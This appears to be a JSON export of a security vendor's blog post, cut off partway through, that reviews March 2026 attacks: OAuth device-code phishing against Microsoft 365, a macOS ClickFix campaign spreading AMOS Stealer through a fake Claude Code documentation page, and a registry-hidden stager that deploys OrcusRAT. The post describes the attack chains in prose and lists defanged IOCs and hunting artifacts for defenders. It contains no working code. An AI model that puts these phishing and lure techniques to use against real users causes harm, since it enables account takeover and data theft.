{"id":19709,"date":"2026-04-01T12:08:31","date_gmt":"2026-04-01T12:08:31","guid":{"rendered":"\/cybersecurity-blog\/?p=19709"},"modified":"2026-04-03T13:10:40","modified_gmt":"2026-04-03T13:10:40","slug":"major-cyber-attacks-march-2026","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/","title":{"rendered":"Major Cyber Attacks in March 2026: OAuth Phishing,\u00a0SVG Smuggling,\u00a0Magecart, and More\u00a0"},"content":{"rendered":"\n<p>March 2026 brought a wave of cyber attacks that reflected how quickly modern threats can move from subtle early signals to serious business impact. <a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a> analysts identified and explored several major threats this month, exposing phishing campaigns, stealthy malware, payment-skimming activity, and resilient botnet infrastructure affecting organizations across industries.<\/p>\n\n\n\n<p>From Microsoft 365 token abuse and registry-hidden RAT delivery to card theft, macOS backdoor activity, and multi-vector DDoS operations, the threat landscape in March showed how much harder early detection has become for security teams.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Key Business Risks That Stood Out in March Attacks&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Trusted services and normal-looking workflows were repeatedly used to hide malicious activity, increasing the risk of delayed detection across enterprise email, cloud, payment, and endpoint environments.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Attacks&nbsp;observed&nbsp;in March affected industries including&nbsp;<strong>government,&nbsp;<\/strong><a href=\"https:\/\/any.run\/by-industry\/finance\/\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>finance<\/strong><\/a><strong>, healthcare, technology, education, manufacturing, and energy<\/strong>, with risks extending beyond&nbsp;initial&nbsp;access into&nbsp;token abuse, remote access, card theft, and broader malware deployment.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Stealthy, multi-stage delivery methods made early&nbsp;signals weaker and investigations slower, raising the likelihood of escalation before security teams could confirm malicious behavior.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>For organizations, the business impact was not limited to infection alone, but included&nbsp;<strong>fraud, downtime, deeper compromise, and higher operational costs tied to delayed response<\/strong>.&nbsp;<\/li>\n<\/ul>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\"> Reduce <\/span> the risk of delayed detection\n<br>Help your team <span class=\"highlight\">investigate faster<\/span>  and respond earlier\n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-march-2026&#038;utm_term=010426&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nPower up your SOC\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">1.&nbsp;EvilTokens: OAuth Device Code Phishing Enables M365 Account Takeover Without Credential Theft&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7434937055455055872\" target=\"_blank\" rel=\"noreferrer noopener\">Post on LinkedIn<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/cybersecurity-blog\/oauth-device-code-phishing\/\" target=\"_blank\" rel=\"noreferrer noopener\">Check detailed breakdown<\/a>&nbsp;<\/p>\n\n\n\n<p>ANY.RUN analysts&nbsp;observed&nbsp;a sharp rise in&nbsp;<strong>EvilTokens<\/strong>, a phishing campaign abusing Microsoft\u2019s OAuth Device Code flow, with more than&nbsp;<strong>180 phishing URLs detected in just one week<\/strong>. Instead of stealing credentials on a fake login page, attackers trick victims into entering a verification code on&nbsp;<strong>microsoft[.]com\/devicelogin<\/strong>, which causes Microsoft to issue OAuth tokens directly to the attacker.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-768x1024.jpeg\" alt=\"\" class=\"wp-image-19722\" style=\"width:408px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-768x1024.jpeg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-225x300.jpeg 225w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-1152x1536.jpeg 1152w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-1536x2048.jpeg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-370x493.jpeg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-270x360.jpeg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-740x987.jpeg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCkQkhaWAAAle4c-scaled.jpeg 1920w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><figcaption class=\"wp-element-caption\"><em>Execution chain of&nbsp;EvilTokens<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>This makes&nbsp;EvilTokens&nbsp;especially dangerous for organizations relying on traditional phishing detection. The user&nbsp;signs in through a legitimate Microsoft page, completes MFA, and never&nbsp;submits&nbsp;credentials to the phishing site. As a result, the compromise shifts from&nbsp;<strong>password theft to token abuse<\/strong>, giving attackers access to Microsoft 365 resources while blending into normal authentication activity.&nbsp;<\/p>\n\n\n\n<p>Because the workflow runs over encrypted HTTPS and uses legitimate Microsoft infrastructure, key attack&nbsp;signals are often hidden from security teams. That delays validation, extends investigations, and increases the chance of escalation before analysts can confirm what happened.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/885afc1c-b616-46d7-9bc3-81185ee07fe3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See full attack flow exposed in ANY.RUN Sandbox<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"657\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-1024x657.png\" alt=\"Fake verification granting access to external client\" class=\"wp-image-19723\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-1024x657.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-300x192.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-768x493.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-370x237.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-270x173.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3-740x475.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/oauth_3.png 1384w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Fake verification granting access to external client<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Inside ANY.RUN Sandbox, automatic&nbsp;<strong>SSL decryption<\/strong>&nbsp;revealed the hidden JavaScript and backend communication used to orchestrate the phishing flow. In this case, analysts uncovered high-confidence network indicators such as:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\/api\/device\/start&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\/api\/device\/status\/*&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>X-Antibot-Token&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>When seen in HTTP requests to non-legitimate hosts, these artifacts become strong hunting&nbsp;signals for&nbsp;identifying&nbsp;related phishing infrastructure and improving detection coverage.&nbsp;<\/p>\n\n\n\n<p>To investigate similar activity and&nbsp;validate&nbsp;detection logic, use this&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI&nbsp;Lookup<\/a>&nbsp;query:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookup#%7B%22query%22:%22threatName:%5C%22oauth-ms-phish%5C%22%22,%22dateRange%22:7%7D\" target=\"_blank\" rel=\"noreferrer noopener\">threatName:&#8221;oauth-ms-phish&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"700\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-1024x700.png\" alt=\"\" class=\"wp-image-19724\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-1024x700.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-300x205.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-768x525.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-370x253.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-270x185.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb-740x506.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/imageb.png 1159w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Targeted industries and countries displayed in TI&nbsp;Lookup<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>TI Lookup helps teams quickly assess the broader attack landscape around EvilTokens and related OAuth phishing activity. Recent submissions show notable targeting across <strong>Technology, Education, Manufacturing, and Government &amp; Administration<\/strong>, especially in the United States and India, while other regions are also affected.<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nGet <span class=\"highlight\">broader visibility<\/span> into malware and phishing activity\n<br>Use <span class=\"highlight\">TI\u00a0Lookup<\/span>\u00a0to track related infrastructure and IOCs\n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-march-2026&#038;utm_term=010426&#038;utm_content=linktotilookup#register?redirect-ref=intelligence.any.run\/analysis\/lookup\" rel=\"noopener\" target=\"_blank\">\nInvestigate in TI Lookup\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>This gives SOC teams access to related sandbox analyses, IOCs, and behavioral patterns they can use to strengthen detections and hunting. For CISOs, that means earlier visibility into relevant campaigns, better prioritization of response efforts, and a stronger ability to reduce the business impact of Microsoft 365 account takeover.&nbsp;<\/p>\n\n\n\n<p>IOCs related to this attack:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>singer-bodners-bau-at-s-account[.]workers[.]dev&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>dibafef289[.]workers[.]dev&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>ab-monvoisinproduction-com-s-account[.]workers[.]dev&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>subzero908[.]workers[.]dev&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>sandra-solorzano-duncanfamilyfarms-net-s-account[.]workers[.]dev&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>tyler2miler-proton-me-s-account[.]workers[.]dev&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">2.&nbsp;macOS&nbsp;ClickFix&nbsp;Campaign Targets Claude Code Users with AMOS Stealer and Backdoor Access&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7442565604059828224\/\" target=\"_blank\" rel=\"noreferrer noopener\">Post on LinkedIn<\/a><\/p>\n\n\n\n<p>ANY.RUN analysts&nbsp;identified&nbsp;a&nbsp;<strong>macOS-specific&nbsp;ClickFix&nbsp;campaign<\/strong>&nbsp;targeting users of AI tools such as&nbsp;Claude Code, Grok, n8n,&nbsp;NotebookLM, Gemini CLI,&nbsp;OpenClaw, and Cursor. In the observed case, attackers used a redirect from&nbsp;Google Ads&nbsp;to a fake Claude Code documentation page, where a&nbsp;ClickFix&nbsp;flow pushed the victim to run a terminal command that&nbsp;ultimately delivered&nbsp;<strong>AMOS Stealer<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"570\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-1024x570.png\" alt=\"Fake Claude Code documentation page used as a lure\" class=\"wp-image-19725\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-1024x570.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-300x167.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-768x428.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-1536x855.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-2048x1141.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-370x206.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-270x150.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.14.06-740x412.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Fake Claude Code documentation page used as a lure<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Once executed, the infection chain moved beyond credential theft. The malware collected browser data, saved credentials, Keychain contents, and sensitive files, then deployed a backdoor that provided continued access to the infected Mac. This makes the attack more serious than a one-time stealer infection, especially in enterprise environments where&nbsp;macOS&nbsp;systems often hold developer access, internal documentation, and business-critical credentials.&nbsp;<\/p>\n\n\n\n<p>How the attack unfolds:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Google Ads redirect sends the victim to a fake Claude Code documentation page&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>ClickFix&nbsp;lures the user into running a terminal command&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The command downloads and executes an encoded script&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>AMOS Stealer<\/strong>&nbsp;collects browser data, saved credentials, Keychain contents, and sensitive files&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A backdoor is deployed for continued access&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The updated&nbsp;~\/.mainhelper&nbsp;module enables an interactive reverse shell over WebSocket with PTY support&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"621\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-1024x621.png\" alt=\"AMOS Stealer detected by ANY.RUN\u00a0\" class=\"wp-image-19726\" style=\"width:560px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-1024x621.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-300x182.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-768x465.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-370x224.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-270x164.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00-740x448.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-31-at-23.22.00.png 1188w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>AMOS Stealer detected by ANY.RUN<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>A key finding in this case was the evolution of the backdoor module&nbsp;<strong>~\/.mainhelper<\/strong>. Previously described as a more limited implant, the updated variant now supports a fully interactive reverse shell, giving attackers persistent, hands-on access to the infected system in real time.&nbsp;<\/p>\n\n\n\n<p>For defenders, that changes the risk&nbsp;significantly. What starts as a phishing-style&nbsp;ClickFix&nbsp;infection can quickly turn into long-term remote access, data theft, and broader compromise. Multi-stage delivery, obfuscated scripts, and abuse of legitimate&nbsp;macOS&nbsp;components also break visibility into weaker&nbsp;signals, which can slow validation and delay escalation.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/74f5000d-aa91-4745-9fc7-fdd95549874b\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>See the full&nbsp;macOS&nbsp;ClickFix campaign execution chain<\/strong><\/a><strong><\/strong>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-768x1024.jpeg\" alt=\"macOS\u00a0ClickFix\u00a0campaign details discovered by ANY.RUN\" class=\"wp-image-19727\" style=\"width:514px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-768x1024.jpeg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-225x300.jpeg 225w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-1152x1536.jpeg 1152w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-1536x2048.jpeg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-370x493.jpeg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-270x360.jpeg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-740x987.jpeg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HEQqsLIXsAAnCXU-scaled.jpeg 1920w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><figcaption class=\"wp-element-caption\"><em>macOS&nbsp;ClickFix&nbsp;campaign details discovered by ANY.RUN<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>ANY.RUN Sandbox helps teams investigate&nbsp;<a href=\"https:\/\/any.run\/cybersecurity-blog\/anyrun-macos-sandbox\/\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>macOS<\/strong><\/a><strong>, Windows, Linux, and Android<\/strong>&nbsp;threats with visibility into execution flow, attacker&nbsp;behavior, persistence mechanisms, and dropped artifacts. In cases like this, this cross-platform threat analysis helps analysts confirm malicious activity faster, attribute the intrusion with greater confidence, and strengthen detection logic before the compromise expands further.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">Expand your SOC\u2019s <span class=\"highlight\">cross-platform threat visibility<\/span>\n<br> <span class=\"highlight\">Reduce breach risk <\/span> with analysis across 4 major operating systems \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-march-2026&#038;utm_term=010426&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nRequest for your team\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">3. RUTSSTAGER: Registry-Stored DLL Leads to&nbsp;OrcusRAT&nbsp;Deployment&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7435323496978882560\/\" target=\"_blank\" rel=\"noreferrer noopener\">Post on LinkedIn<\/a><\/p>\n\n\n\n<p>ANY.RUN analysts detected&nbsp;<strong>RUTSSTAGER<\/strong>, a stealthy malware stager that hides a DLL inside the Windows registry in hexadecimal form, making the payload harder to spot during early triage. In the observed chain, the stager led to the deployment of&nbsp;<strong>OrcusRAT<\/strong>, followed by an&nbsp;additional&nbsp;binary that helped&nbsp;maintain&nbsp;persistence, ran PowerShell-based system checks, and relaunched the RAT when needed.&nbsp;<\/p>\n\n\n\n<p>What makes this threat notable is the way it avoids a straightforward on-disk delivery path. By storing the DLL in the registry instead of dropping it as a conventional file, the malware reduces its visibility and gives defenders fewer obvious artifacts to catch at first glance. The follow-on activity then helps stabilize the infection and keep remote access available on the compromised system.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/b357aa61-29d5-4c7f-87f8-359281319a72\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">Review the full execution chain<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-1024x1024.jpeg\" alt=\"RUTSSTAGER attack details revealed inside ANY.RUN sandbox\" class=\"wp-image-19728\" style=\"width:524px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-1024x1024.jpeg 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-300x300.jpeg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-150x150.jpeg 150w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-768x768.jpeg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-1536x1536.jpeg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-2048x2048.jpeg 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-70x70.jpeg 70w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-370x370.jpeg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-270x270.jpeg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/HCpwCklWIAE9xnG-740x740.jpeg 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>RUTSSTAGER attack details revealed inside ANY.RUN sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Inside ANY.RUN Sandbox,&nbsp;behavioral&nbsp;analysis exposed how the infection unfolded across stages, while file system and process monitoring helped reveal the relationship between the stager, the deployed RAT, and the persistence&nbsp;component. Process synchronization events were especially useful here, showing that the payload components were not acting independently but as part of a coordinated, multi-stage execution chain.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">Catch <span class=\"highlight\">multi-stage malware<\/span> before it goes further\n<br> Expose hidden execution chains and <span class=\"highlight\">speed up <\/span> validation\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-march-2026&#038;utm_term=010426&#038;utm_content=linktoregistration\" rel=\"noopener\" 